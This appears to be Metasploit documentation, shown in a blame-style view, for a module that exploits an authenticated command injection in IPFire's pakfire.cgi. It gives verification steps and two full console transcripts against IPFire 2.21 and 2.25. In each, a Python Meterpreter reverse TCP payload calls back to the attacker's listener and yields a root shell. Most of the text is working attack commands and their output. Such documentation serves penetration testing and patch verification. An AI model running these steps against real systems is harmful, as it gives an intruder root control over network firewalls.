2021-05-22 19:47:37 +03:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2021-06-04 14:33:38 +03:00
|
|
|
[IPFire 2.25 (Core Update 156)](https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso)
|
|
|
|
|
[IPFire 2.21 (Core Update 126)](https://mirror.csclub.uwaterloo.ca/ipfire/releases/ipfire-2.x/2.21-core126/ipfire-2.21.x86_64-full-core126.iso)
|
|
|
|
|
|
|
|
|
|
This module exploits an authenticated command injection vulnerability in the
|
2021-06-10 02:31:42 +03:00
|
|
|
`/cgi-bin/pakfire.cgi` web page of IPFire devices running versions 2.25 Core Update 156
|
|
|
|
|
and prior to execute arbitrary code as the `root` user.
|
2021-05-22 19:47:37 +03:00
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
2021-06-04 14:33:38 +03:00
|
|
|
1. Start msfconsole
|
|
|
|
|
1. Do: `use exploit/linux/http/ipfire_pakfire_exec`
|
|
|
|
|
1. Do: `set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>`
|
|
|
|
|
1. Do: `set password <PASSWORD FOR admin USER ON THE WEB PORTAL>`
|
|
|
|
|
1. Do: `set rhost <TARGET IP>`
|
2021-06-10 02:31:42 +03:00
|
|
|
1. Do: `set lhost <YOUR IP>`
|
2021-06-04 14:33:38 +03:00
|
|
|
1. Do: `exploit`
|
|
|
|
|
1. You should get a shell as the `root` user.
|
2021-05-22 19:47:37 +03:00
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
2021-06-04 14:33:38 +03:00
|
|
|
**USERNAME**
|
|
|
|
|
Username of the administrative user you are authenticating to the web portal as.
|
2021-05-22 19:47:37 +03:00
|
|
|
|
2021-06-04 14:33:38 +03:00
|
|
|
**PASSWORD**
|
|
|
|
|
Password for the administrative user you are authenticating to the web portal as.
|
2021-05-22 19:47:37 +03:00
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
2021-06-04 14:33:38 +03:00
|
|
|
### IPFire 2.21 (Core Update 126)
|
|
|
|
|
```
|
|
|
|
|
msf6 > use exploit/linux/http/ipfire_pakfire_exec
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Using configured payload python/meterpreter/reverse_tcp
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
|
|
|
|
|
|
|
|
|
|
Module options (exploit/linux/http/ipfire_pakfire_exec):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
PASSWORD yes Password to login with
|
|
|
|
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
|
|
|
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
|
|
|
|
RPORT 444 yes The target port (TCP)
|
2021-06-10 02:31:42 +03:00
|
|
|
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
|
|
|
|
|
chine or 0.0.0.0 to listen on all addresses.
|
|
|
|
|
SRVPORT 8080 yes The local port to listen on.
|
2021-06-04 14:33:38 +03:00
|
|
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
2021-06-10 02:31:42 +03:00
|
|
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
|
|
|
|
URIPATH no The URI to use for this exploit (default is random)
|
2021-06-04 14:33:38 +03:00
|
|
|
USERNAME admin yes User to login with
|
|
|
|
|
VHOST no HTTP server virtual host
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Payload options (python/meterpreter/reverse_tcp):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
2021-06-10 02:31:42 +03:00
|
|
|
LHOST yes The listen address (an interface may be specified)
|
2021-06-04 14:33:38 +03:00
|
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Exploit target:
|
|
|
|
|
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
2021-06-10 02:31:42 +03:00
|
|
|
0 Python Dropper
|
2021-06-04 14:33:38 +03:00
|
|
|
|
|
|
|
|
|
2021-06-10 02:31:42 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
|
|
|
|
|
RHOSTS => 172.29.202.191
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
|
|
|
|
|
USERNAME => admin
|
|
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
|
|
|
|
|
PASSWORD => admin
|
2021-06-10 02:31:42 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
|
|
|
|
|
LHOST => 172.29.202.153
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
|
|
|
|
|
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Started reverse TCP handler on 172.29.202.153:4444
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] Executing automatic check (disable AutoCheck to override)
|
|
|
|
|
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Backing up backup.pl to /tmp/1TiE8...
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] Overwriting the contents of backup.pl with a Python header statement
|
|
|
|
|
[*] Appending the contents of backup.pl with the Python code to be executed.
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Executing /usr/local/bin/backupctrl to run the payload
|
|
|
|
|
[*] Sending stage (39392 bytes) to 172.29.202.191
|
|
|
|
|
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
|
|
|
|
|
[+] You should now have your shell, restoring the original contents of the backup.pl file...
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] All done, enjoy the shells!
|
|
|
|
|
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : ipfire.localdomain
|
|
|
|
|
OS : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
|
|
|
|
|
Architecture : x64
|
|
|
|
|
Meterpreter : python/linux
|
2021-06-10 02:31:42 +03:00
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root
|
|
|
|
|
meterpreter > shell
|
|
|
|
|
Process 28379 created.
|
|
|
|
|
Channel 1 created.
|
|
|
|
|
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
|
|
|
|
|
sh: no job control in this shell
|
|
|
|
|
sh-4.3# id
|
|
|
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
|
|
|
sh-4.3#
|
2021-06-04 14:33:38 +03:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### IPFire 2.25 (Core Update 156)
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf6 > use exploit/linux/http/ipfire_pakfire_exec
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Using configured payload python/meterpreter/reverse_tcp
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
|
|
|
|
|
|
|
|
|
|
Module options (exploit/linux/http/ipfire_pakfire_exec):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
PASSWORD yes Password to login with
|
|
|
|
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
|
|
|
|
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
|
|
|
|
RPORT 444 yes The target port (TCP)
|
2021-06-10 02:31:42 +03:00
|
|
|
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
|
|
|
|
|
chine or 0.0.0.0 to listen on all addresses.
|
|
|
|
|
SRVPORT 8080 yes The local port to listen on.
|
2021-06-04 14:33:38 +03:00
|
|
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
2021-06-10 02:31:42 +03:00
|
|
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
|
|
|
|
URIPATH no The URI to use for this exploit (default is random)
|
2021-06-04 14:33:38 +03:00
|
|
|
USERNAME admin yes User to login with
|
|
|
|
|
VHOST no HTTP server virtual host
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Payload options (python/meterpreter/reverse_tcp):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
2021-06-10 02:31:42 +03:00
|
|
|
LHOST yes The listen address (an interface may be specified)
|
2021-06-04 14:33:38 +03:00
|
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Exploit target:
|
|
|
|
|
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
2021-06-10 02:31:42 +03:00
|
|
|
0 Python Dropper
|
2021-06-04 14:33:38 +03:00
|
|
|
|
|
|
|
|
|
2021-06-10 02:31:42 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
|
|
|
|
|
RHOST => 172.29.202.157
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
|
|
|
|
|
USERNAME => admin
|
|
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
|
|
|
|
|
PASSWORD => admin
|
2021-06-10 02:31:42 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
|
|
|
|
|
LHOST => 172.29.202.153
|
2021-06-04 14:33:38 +03:00
|
|
|
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
|
|
|
|
|
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Started reverse TCP handler on 172.29.202.153:4444
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] Executing automatic check (disable AutoCheck to override)
|
|
|
|
|
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Backing up backup.pl to /tmp/8Yndo...
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] Overwriting the contents of backup.pl with a Python header statement
|
|
|
|
|
[*] Appending the contents of backup.pl with the Python code to be executed.
|
2021-06-10 02:31:42 +03:00
|
|
|
[*] Executing /usr/local/bin/backupctrl to run the payload
|
|
|
|
|
[*] Sending stage (39392 bytes) to 172.29.202.157
|
|
|
|
|
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
|
|
|
|
|
[+] You should now have your shell, restoring the original contents of the backup.pl file...
|
2021-06-04 14:33:38 +03:00
|
|
|
[*] All done, enjoy the shells!
|
|
|
|
|
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : ipfire.localdomain
|
|
|
|
|
OS : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
|
|
|
|
|
Architecture : x64
|
|
|
|
|
Meterpreter : python/linux
|
2021-06-10 02:31:42 +03:00
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root
|
|
|
|
|
meterpreter > shell
|
|
|
|
|
Process 10179 created.
|
|
|
|
|
Channel 1 created.
|
|
|
|
|
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
|
|
|
|
|
sh: no job control in this shell
|
|
|
|
|
sh-5.0# id
|
|
|
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
|
|
|
sh-5.0#
|
2021-06-04 14:33:38 +03:00
|
|
|
```
|
